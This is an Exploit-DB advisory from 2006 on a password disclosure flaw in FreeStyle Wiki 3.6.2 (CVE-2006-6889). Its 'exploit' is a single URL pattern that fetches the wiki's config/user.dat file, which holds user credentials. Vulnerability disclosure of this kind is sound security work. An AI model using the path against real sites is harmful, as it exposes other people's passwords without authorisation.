FreeStyle Wiki <= 3.6.2 user.dat Password Disclosure Vulnerability

2006-12-30T00:00:00
ID EDB-ID:3047
Type exploitdb
Reporter bd0rk
Modified 2006-12-30T00:00:00

Description

FreeStyle Wiki <= 3.6.2 (user.dat) Password Disclosure Vulnerability. CVE-2006-6889. Webapps exploit for php platform

                                        
                                                              fswiki 3.6.2 (user.dat) Password Disclosure Vulnerability



=&gt; Affected Software: fswiki 3.6.2

=&gt; Download: http://keihanna.dl.sourceforge.jp/fswiki/20797/wiki3_6_2.zip

=&gt; F0under: bd0rk

=&gt; Greetings: str0ke, TheJT, SHiKaA, Lu7k

[+]Exploit: http://[target]/[fswiki_path]/config/user.dat



#####The german Hacker bd0rk#####

# milw0rm.com [2006-12-30]